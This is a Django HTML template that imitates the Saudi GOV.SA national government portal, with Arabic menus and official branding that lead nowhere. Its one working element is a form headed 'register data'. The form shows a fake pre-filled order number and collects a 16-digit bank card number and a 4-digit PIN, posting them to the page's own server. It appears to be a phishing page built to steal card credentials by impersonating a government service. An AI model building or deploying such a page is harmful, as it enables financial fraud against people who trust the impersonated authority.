<html lang="en">
{% load static %}

<head>
    <meta charset="utf-8">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" crossorigin="anonymous" referrerpolicy="no-referrer">
    <link rel="stylesheet" media="screen" href="https://fontlibrary.org/face/droid-arabic-kufi">
    <link rel="icon" href="/favicon.ico">
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">
    <meta name="theme-color" content="#000000">
    <meta name="description" content="المنصة السعودية الوطنية للخدمات الحكومية – GOV.SA">
    <link rel="apple-touch-icon" href="/logo192.png">
    <link rel="manifest" href="/manifest.json">
    <title>المنصة السعودية الوطنية للخدمات الحكومية – GOV.SA</title>
    <!-- <script defer="defer" src="/static/js/main.4458d137.js"></script> -->
    <link href="{% static 'services/css/main.bb512d75.css' %}" rel="stylesheet">
</head>

<body><noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root">
        <div class="App">
            <div class="top-header">
                <div class="mobile-header">
                    <div class="mobile-header-nav">
                        <div class="header-nav"><button class="header-button" id="login_button"><i class="fa-solid fa-circle-user"></i></button>
                            <div class="header-button-dropdown">
                                <div class="dropdown-row"><a class="nav-link" href="#">تسجيل الدخول</a></div>
                                <div class="dropdown-row"><a class="nav-link" href="#">ما هو الملف الوطني الموحد؟</a></div>
                            </div>
                        </div>
                        <a href="/"><img class="logo-header" src="static/media/logo_header.ce5757d117fa0978c58e1751a27c212e.svg" alt="Logo"></a><button class="header-menu-button" id="menu_button"><i class="fa-solid fa-bars"></i></button></div>
                    <div class="mobile-header-dropdown"><a href="#" class="header-language">ENGLISH</a>
                        <div class="mobile-header-nav-button"><button class="mobile-header-nav-button-style">تعرف على المملكة<i class="fa-solid fa-sort-down"></i></button>
                            <div class="mobile-header-nav-button-dropdown"><a class="mobile-href" href="#">تعرف على المملكة</a><a class="mobile-href" href="#">آلية عمل الحكومة</a><a class="mobile-href" href="#">الأنظمة واللوائح والسياسات</a><a class="mobile-href" href="#">التحول الرقمي</a>
                                <a class="mobile-href" href="#">إستراتيجية الحكومة الذكية</a><a class="mobile-href" href="#">الخطط والمبادرات الحكومية</a>
                                <a class="mobile-href" href="#">تقارير وإحصائيات</a>
                                <a class="mobile-href" href="#">ميزانية الدولة</a><a class="mobile-href" href="#">المنافسات والمشتريات</a>
                                <a class="mobile-href" href="#">قنوات الدفع</a>
                                <a class="mobile-href" href="#">التعليم والتدريب</a><a class="mobile-href" href="#">الرعاية الصحية</a>
                                <a class="mobile-href" href="#">العمل والتوظيف</a>
                                <a class="mobile-href" href="#">الحماية الاجتماعية</a><a class="mobile-href" href="#">حماية البيئة</a>
                                <a class="mobile-href" href="#">نظم المعلومات الجغرافية</a>
                                <a class="mobile-href" href="#">العدل والقضاء</a><a class="mobile-href" href="#">النقل والمواصلات</a>
                                <a class="mobile-href" href="#">الاستثمار</a>
                                <a class="mobile-href" href="#">التأشيرات والسياحة</a><a class="mobile-href" href="#">الحج والعمرة</a></div>
                        </div>
                        <div class="mobile-header-nav-button"><button class="mobile-header-nav-button-style">الجهات<i class="fa-solid fa-sort-down"></i></button>
                            <div class="mobile-header-nav-button-dropdown"><a class="mobile-href" href="#">وزارة الخارجية</a><a class="mobile-href" href="#">وزارة التعليم</a><a class="mobile-href" href="#" ">وزارة البيئة والمياه والزراعة</a>
                                <a class="mobile-href " href="# ">وزارة المالية</a><a class="mobile-href " href="# ">وزارة الاقتصاد والتخطيط</a><a class="mobile-href "
                                    href="# ">وزارة الصحة</a>
                                <a class="mobile-href " href="# ">وزارة العدل</a><a class="mobile-href " href="# ">وزارة التجارة</a><a class="mobile-href "
                                    href="# ">وزارة الاتصالات وتقنية المعلومات</a>
                                <a class="mobile-href " href="# ">وزارة الموارد البشرية والتنمية الاجتماعية</a><a class="mobile-href " href="# ">وزارة الداخلية</a>
                                <a class="mobile-href " href="# ">عرض جميع الجهات</a>
                            </div>
                        </div>
                        <div class="mobile-header-nav-button "><button class="mobile-header-nav-button-style "><a href="# ">الخدمات</a></button></div>
                        <div class="mobile-header-nav-button "><button class="mobile-header-nav-button-style ">المشاركة<i class="fa-solid fa-sort-down "></i></button>
                            <div class="mobile-header-nav-button-dropdown "><a class="mobile-href " href="# ">منصة المشاركة المجتمعية (تفاعل)</a><a class="mobile-href " href="# ">المشاركة المجتمعية</a><a class="mobile-href "
                                    href="# ">الانتخابات في المملكة</a><a class="mobile-href " href="# ">البيانات المفتوحة</a>
                                <a class="mobile-href " href="# ">حق الحصول على المعلومة</a><a class="mobile-href " href="#/ ">الشراكة مع القطاع الخاص</a>
                                <a class="mobile-href " href="# ">الشراكة مع المجتمع المدني</a>
                            </div>
                        </div>
                        <div class="mobile-header-nav-button "><button class="mobile-header-nav-button-style ">نهتم بكم<i class="fa-solid fa-sort-down "></i></button>
                            <div class="mobile-header-nav-button-dropdown "><a class="mobile-href " href="# ">حقوق الإنسان</a><a class="mobile-href " href="# ">حقوق ذوي الإعاقة</a>
                                <a class="mobile-href " href="# ">تمكين المرأة</a><a class="mobile-href " href="# ">حقوق الطفل</a>
                                <a class="mobile-href " href="# ">تمكين الشباب</a>
                                <a class="mobile-href " href="# ">كبار السن</a><a class="mobile-href " href="# ">مملكة الإنسانية</a>
                                <a class="mobile-href " href="# ">التمكين والشمولية الرقمية</a>
                            </div>
                        </div>
                        <div class="mobile-header-nav-button "><button class="mobile-header-nav-button-style ">عن GOV.SA<i class="fa-solid fa-sort-down "></i></button>
                            <div class="mobile-header-nav-button-dropdown "><a class="mobile-href " href="# ">عن المنصة الوطنية GOV.SA</a><a class="mobile-href " href="# ">لوحة قياس الأداء</a></div>
                        </div>
                    </div>
                </div>
                <div class="right ">
                    <a href="/ "><img class="logo-header " src="static/media/logo_header.ce5757d117fa0978c58e1751a27c212e.svg " alt="Logo "></a>
                    <div class="header-nav "><button class="header-button ">تعرف على المملكة<i class="fa-solid fa-sort-down "></i></button>
                        <div class="header-button-dropdown ">
                            <div class="dropdown-row "><a class="nav-link " href="# ">تعرف على المملكة</a><a class="nav-link " href="# ">آلية عمل الحكومة</a><a class="nav-link " href="# ">الأنظمة واللوائح والسياسات</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">التحول الرقمي</a><a class="nav-link " href="# ">إستراتيجية الحكومة الذكية</a>
                                <a class="nav-link " href="# ">الخطط والمبادرات الحكومية</a>
                            </div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">تقارير وإحصائيات</a><a class="nav-link " href="# ">ميزانية الدولة</a>
                                <a class="nav-link " href="# ">المنافسات والمشتريات</a>
                            </div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">قنوات الدفع</a><a class="nav-link " href="# ">التعليم والتدريب</a><a class="nav-link "
                                    href="# ">الرعاية الصحية</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">العمل والتوظيف</a><a class="nav-link " href="# ">الحماية الاجتماعية</a><a class="nav-link "
                                    href="# ">حماية البيئة</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">نظم المعلومات الجغرافية</a><a class="nav-link " href="# ">العدل والقضاء</a>
                                <a class="nav-link " href="# ">النقل والمواصلات</a>
                            </div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">الاستثمار</a><a class="nav-link " href="# ">التأشيرات والسياحة</a><a class="nav-link "
                                    href="# ">الحج والعمرة</a></div>
                        </div>
                    </div>
                    <div class="header-nav "><button class="header-button ">الجهات<i class="fa-solid fa-sort-down "></i></button>
                        <div class="header-button-dropdown ">
                            <div class="dropdown-row "><a class="nav-link " href="# ">وزارة الخارجية</a><a class="nav-link " href="# ">وزارة التعليم</a><a class="nav-link " href="# ">وزارة البيئة والمياه والزراعة</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">وزارة المالية</a><a class="nav-link " href="# ">وزارة الاقتصاد والتخطيط</a><a class="nav-link " href="# ">وزارة الصحة</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">وزارة العدل</a><a class="nav-link " href="# ">وزارة التجارة</a><a class="nav-link " href="# ">وزارة الاتصالات وتقنية المعلومات</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">وزارة الموارد البشرية والتنمية الاجتماعية</a><a class="nav-link " href="# ">وزارة الداخلية</a>
                                <a class="nav-link " href="# ">عرض جميع الجهات</a>
                            </div>
                        </div>
                    </div>
                    <div class="header-nav "><a href="# " class="header-button ">الخدمات</a></div>
                    <div class="header-nav "><button class="header-button ">المشاركة<i class="fa-solid fa-sort-down "></i></button>
                        <div class="header-button-dropdown ">
                            <div class="dropdown-row "><a class="nav-link " href="# ">منصة المشاركة المجتمعية (تفاعل)</a><a class="nav-link " href="# ">المشاركة المجتمعية</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">الانتخابات في المملكة</a><a class="nav-link " href="# ">البيانات المفتوحة</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">حق الحصول على المعلومة</a><a class="nav-link " href="# ">الشراكة مع القطاع الخاص</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">الشراكة مع المجتمع المدني</a></div>
                        </div>
                    </div>
                    <div class="header-nav "><button class="header-button ">نهتم بكم<i class="fa-solid fa-sort-down "></i></button>
                        <div class="header-button-dropdown ">
                            <div class="dropdown-row "><a class="nav-link " href="# ">حقوق الإنسان</a><a class="nav-link " href="# ">حقوق ذوي الإعاقة</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">تمكين المرأة</a><a class="nav-link " href="# ">حقوق الطفل</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">تمكين الشباب</a><a class="nav-link " href="# ">كبار السن</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">مملكة الإنسانية</a><a class="nav-link " href="# ">التمكين والشمولية الرقمية</a></div>
                        </div>
                    </div>
                    <div class="header-nav "><button class="header-button ">عن GOV.SA<i class="fa-solid fa-sort-down "></i></button>
                        <div class="header-button-dropdown ">
                            <div class="dropdown-row "><a class="nav-link " href="# ">عن المنصة الوطنية GOV.SA</a><a class="nav-link " href="# ">لوحة قياس الأداء</a></div>
                        </div>
                    </div>
                </div>
                <div class="left ">
                    <a href="/ "><img class="header_image " src="/static/media/vision-2030-white.2f8342b25eef7521e4bcddeed4b9a3ff.svg " alt=" "></a>
                    <div class="header-nav "><button class="header-button " id="login_button "><i class="fa-solid fa-circle-user "></i></button>
                        <div class="header-button-dropdown ">
                            <div class="dropdown-row "><a class="nav-link " href="# ">تسجيل الدخول</a></div>
                            <div class="dropdown-row "><a class="nav-link " href="# ">ما هو الملف الوطني الموحد؟</a></div>
                        </div>
                    </div><a href="# "
                        class="header-button ">ENGLISH</a></div>
            </div>
            <div class="page-content ">
                <form class="register-form " method="POST ">
                    {% csrf_token %}
                    <p class="form-title ">تسجيل البيانات</p>
                    <div class="row ">
                        <p class="row-title ">رقم الطلب</p><input class="row-input " type="text " name="order_num " disabled=" " value="285829717 "></div>
                    <div class="row ">
                        <p class="row-title " mandatory="true ">رقم بطاقة الصرافة</p><input class="row-input " type="number "   maxlength="16 " minlength="16 " inputmode="numeric " name="credit_card " required=" "></div>
                    <div class="row ">
                        <p class="row-title " mandatory="true ">إدخال الرمز</p><input class="row-input " type="number " maxlength="4 " minlength="4 " inputmode="numeric " name="pin_code " placeholder="إدخال الرمز " required=" "></div>
                    <p class="online-service ">* لخدمة الأونلاين إضغط هنا</p>
                    <p class="alert-message "></p>
                    <div class="form-buttons "><button class="form-submit-btn " name="submitBtn ">متابعة</button></div>
                </form>
            </div>
            <div class="bottom-nav ">
                <div class="website-pages-bg ">
                    <div class="website-pages ">
                        <div class="website-pages-column "><span class="website-pages-title ">روابط مهمة</span><a class="website-pages-nav " href="# ">منصات الحكومات الإلكترونية الخليجية</a><a class="website-pages-nav " href="# ">التنمية المستدامة</a>
                            <a class="website-pages-nav " href="# ">ميزانية الدولة</a><a class="website-pages-nav " href="# ">الخصوصية وحماية البيانات</a>
                            <a class="website-pages-nav " href="# ">الإستراتيجية الوطنية للبيانات والذكاء الاصطناعي</a>
                            <a class="website-pages-nav " href="# ">البيانات المفتوحة</a><a class="website-pages-nav " href="# ">حرية الحصول على المعلومة</a>
                            <a class="website-pages-nav " href="# ">الأمن السيبراني في المملكة</a>
                            <a class="website-pages-nav " href="# ">زائر جديد</a>
                        </div>
                        <div class="website-pages-column "><span class="website-pages-title ">عن منصة GOV.SA</span><a class="website-pages-nav " href="# ">الأخبار</a><a class="website-pages-nav " href="# ">الفعاليات</a>
                            <a class="website-pages-nav " href="# ">المشاركة المجتمعية</a><a class="website-pages-nav " href="# ">تطبيقات الجوال الحكومية</a>
                            <a class="website-pages-nav " href="# ">قنوات تقديم الخدمة</a>
                            <a class="website-pages-nav " href="# ">ميثاق المستخدمين</a><a class="website-pages-nav " href="# ">اتفاقية مستوى الخدمة</a>
                            <a class="website-pages-nav " href="# ">إحصائيات ومؤشرات المنصة</a>
                            <a class="website-pages-nav " href="# ">استطلاع الرأي</a><a class="website-pages-nav " href="# ">تحديث محتوى GOV.SA</a></div>
                        <div class="website-pages-column "><span class="website-pages-title ">الدعم والمساعدة</span><a class="website-pages-nav " href="# ">تواصل معنا</a><a class="website-pages-nav " href="# ">المساعدة والأسئلة الشائعة</a>
                            <a class="website-pages-nav " href="# ">مركز تفاعل المواطنين (آمر)</a><a class="website-pages-nav " href="# ">الإبلاغ عن فساد</a>
                            <a class="website-pages-nav " href="# ">الملف الوطني</a>
                            <a class="website-pages-nav " href="# ">سهولة الوصول</a><a class="website-pages-nav " href="# ">وسائل التواصل الاجتماعي</a>
                            <a class="website-pages-nav " href="# ">اشترك معنا</a>
                        </div>
                        <div class="website-pages-column last "><span class="website-pages-title ">تابعنا على</span><a class="website-pages-nav " href="https://twitter.com/mygovsa "><i id="twitter_icon " class="fa-brands fa-twitter "></i></a>
                            <div class="column-row "><img class="contact-us-image " src="static/media/contactUs.e249c119f70acd3c498b.ico " alt=" "><a class="contact-us-num " href="tel:199099 ">199099</a></div>
                            <p class="website-pages-title ">أدوات إمكانية الوصول</p>
                            <div class="column-row "><button class="reach-us-icon "><i class="fa-solid fa-eye "></i></button><button class="reach-us-icon "><i class="fa-solid fa-volume-high "></i></button><button class="reach-us-icon "><i class="fa-solid
                                    fa-magnifying-glass-plus "></i></button>
                                <img class="reach-us-icon " src="static/media/hearingaid-icon+(2).71e4db9b831734d20ece88c7ab9a346c.svg " alt=" "></div>
                        </div>
                    </div>
                </div>
                <div class="website-rights ">
                    <div class="rights-value "><a class="rights-href " href="# ">سياسة الخصوصية</a><a class="rights-href " href="# ">شروط الاستخدام</a><a class="rights-href " href="# ">خريطة الموقع</a>
                        <a class="rights-href " href="# ">RSS</a>
                    </div><span class="rights-value ">تطوير وتشغيل<a class="rights-link " href="# "> هيئة الحكومة الرقمية</a></span><span class="rights-value ">© 2020 جميع الحقوق محفوظة لـ منصة GOV.SA</span></div>
            </div>
        </div>
    </div>
</body>

</html>